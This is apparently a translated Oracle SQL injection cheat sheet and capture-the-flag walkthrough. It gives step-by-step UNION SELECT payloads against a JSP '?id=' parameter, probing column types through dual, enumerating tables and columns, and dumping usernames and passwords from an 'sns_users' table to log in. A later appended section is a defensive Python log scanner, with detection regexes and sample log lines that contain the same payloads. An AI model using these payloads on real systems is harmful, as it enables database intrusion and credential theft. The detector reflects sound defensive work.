Oracle is a large enterprise database; the server-side scripting language is usually JSP, and the default Oracle listener port is 1521.
Oracle ships with the built-in virtual table dual. Every Oracle query must contain a complete FROM clause, and in a UNION the type of each column must match exactly; null is normally used to probe the column types.
The default users are sys and system; the highest privilege level is dba.
0. System queries
Find the tables that contain a given column name:
SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%';
Query the Nth row:
SELECT username FROM (SELECT ROWNUM r, username FROM all_users ORDER BY username) WHERE r=9; -- returns the 9th row (counting from 1)
Current user:
SELECT user FROM dual;
List all users:
SELECT username FROM all_users ORDER BY username;
List databases (schemas):
SELECT DISTINCT owner FROM all_tables;
List table names:
SELECT table_name FROM all_tables;
SELECT owner, table_name FROM all_tables;
List column names:
SELECT column_name FROM all_tab_columns WHERE table_name = 'blah';
SELECT column_name FROM all_tab_columns WHERE table_name = 'blah' and owner = 'foo';
Locate the database files:
SELECT name FROM V$DATAFILE;
1. Use ORDER BY to determine the number of columns
2. Determine the column types
and 1=2 union select null,null..... from dual, then determine the type of each column one at a time, as follows:
and 1=2 union select 'null',null...... from dual returns normally: the first column is a character type; otherwise it is numeric.
When the first column is a character type, determine the type of the second column:
and 1=2 union select 'null','null'...... from dual returns normally: the second column is a character type; otherwise it is numeric.
When the first column is numeric, determine the type of the second column:
and 1=2 union select null,'null'...... from dual returns normally: the second column is a character type; otherwise it is numeric.
Determine the type of the nth column by continuing in the same way.
In this case both columns are character types.
3. Determine the echo (display) positions
4. Preparation
Current user (privilege context):
and 1=2 union select null,(select sys_context('userenv','current_user') from dual) from dual
Get the current database (instance) name:
and 1=2 union select null,(select instance_name from V$INSTANCE) from dual
Get the current database version:
and 1=2 union select null,(select banner from sys.v_$version where rownum=1) from dual
rownum: limits the subquery to a single row, since only one value can be shown at a time
5. Enumerate tables
Enumerate the first table in the current schema:
and 1=2 union select '1',(select table_name from user_tables where rownum=1) from dual
Enumerate the second table in the current schema:
and 1=2 union select '1',(select table_name from user_tables where rownum=1 and table_name not in ('<first table name>')) from dual
Continue in the same way for the nth table.
What we are after is the users' account credentials, so search directly for table names containing "user":
and 1=2 union select (select table_name from all_tables where rownum=1 and table_name like '%user%'),'2' from dual
6. Get the column names of a table
Enumerate the first column of a table:
and 1=2 union select '1',(select column_name from user_tab_columns where rownum=1 and table_name='<table name>') from dual
Enumerate the second column of a table:
and 1=2 union select '1',(select column_name from user_tab_columns where rownum=1 and table_name='<table name>' and column_name not in ('<first column name>')) from dual
Continue in the same way for the remaining columns.
?id=-1 union select (select column_name from all_tab_columns where rownum=1 and table_name = 'sns_users'),'2' from dual
?id=-1 union select (select column_name from all_tab_columns where rownum=1 and table_name='sns_users' and column_name not in ('USER_NAME')),'2' from dual
7. Retrieve the data
?id=-1 union select user_name,user_pwd from "sns_users"
The username and password obtained this way do not log in.
?id=-1 union select user_name,user_pwd from "sns_users" where USER_NAME<>'hu'
This returns the second username/password pair.
Log in with it to obtain the key.
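From the defensive side, the whole probing sequence above leaves a very recognisable footprint in web server logs: a UNION SELECT that ends in FROM dual, ROWNUM=1 row-walking, and references to Oracle dictionary views such as all_tab_columns or V$INSTANCE. The following detector is an added example (not part of the original cheat sheet) that URL-decodes each request's query string and flags those indicators; the log lines are constructed samples and the regular expressions and function names are my own.

```python
import re
from urllib.parse import unquote_plus

# Indicators taken from the Oracle probing sequence: mandatory FROM dual,
# ROWNUM-limited subqueries and the dictionary views used for enumeration.
ORACLE_UNION_PROBE = re.compile(
    r"union\s+(?:all\s+)?select\b.*\bfrom\s+dual\b", re.I | re.S)
ORACLE_DICT_VIEWS = re.compile(
    r"\b(?:all_tab_columns|all_tables|user_tables|user_tab_columns|all_users"
    r"|v\$(?:instance|version|datafile)|v_\$version|sys_context)\b", re.I)
ROWNUM_WALK = re.compile(r"\brownum\s*=\s*1\b", re.I)

def classify_request(raw_query: str) -> dict:
    """Decode a query string once and report which Oracle-injection
    indicators it matches; score = number of distinct indicators hit."""
    q = unquote_plus(raw_query)
    hits = {
        "union_from_dual": bool(ORACLE_UNION_PROBE.search(q)),
        "dictionary_view": bool(ORACLE_DICT_VIEWS.search(q)),
        "rownum_walk": bool(ROWNUM_WALK.search(q)),
    }
    score = sum(hits.values())
    return {"query": q, "hits": hits, "score": score, "suspicious": score >= 1}

def scan_access_log(lines):
    """Yield (client_ip, finding) for every combined-format log line whose
    query string matches at least one indicator."""
    for line in lines:
        m = re.match(r'(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+)', line)
        if not m:
            continue
        ip, path = m.group(1), m.group(2)
        if "?" not in path:
            continue
        finding = classify_request(path.split("?", 1)[1])
        if finding["suspicious"]:
            yield ip, finding

# Constructed sample log lines (not taken from any real server)
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /news.jsp?id=7 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /news.jsp?id=-1+union+select+null,(select+instance_name+from+V$INSTANCE)+from+dual HTTP/1.1" 200 640',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /news.jsp?id=-1+union+select+(select+column_name+from+all_tab_columns+where+rownum%3D1+and+table_name%3D%27sns_users%27),%272%27+from+dual HTTP/1.1" 200 655',
]

if __name__ == "__main__":
    for ip, f in scan_access_log(SAMPLE_LOG):
        print(ip, f["score"], [k for k, v in f["hits"].items() if v])
```

The score is a simple indicator count; in practice the query-string decoding step matters most, because the probes arrive percent-encoded and a raw-string match misses them.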